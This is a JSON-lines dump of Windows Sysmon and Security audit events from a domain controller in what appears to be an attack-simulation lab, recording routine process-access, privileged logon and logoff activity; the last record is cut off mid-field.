{"EventTime":"2020-08-01 07:02:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8614,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:28.091\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1384-5F25-0000-001081E10F00}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:28.091","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1384-5F25-0000-001081E10F00}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8615,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:28.091\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1384-5F25-0000-001081E10F00}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:28.091","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1384-5F25-0000-001081E10F00}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8616,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:28.107\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1384-5F25-0000-001081E10F00}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:28.107","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1384-5F25-0000-001081E10F00}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8617,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:28.185\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:28.185","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220706,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xFE6EF\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xfe6ef","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:02:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220707,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xFE6EF\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t52767\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xfe6ef","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"52767","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:02:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220708,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xFE6EF\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xfe6ef","LogonType":"3","EventReceivedTime":"2020-08-01 07:02:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8618,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:29.201\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:29.201","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8619,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:30.216\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:30.216","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files 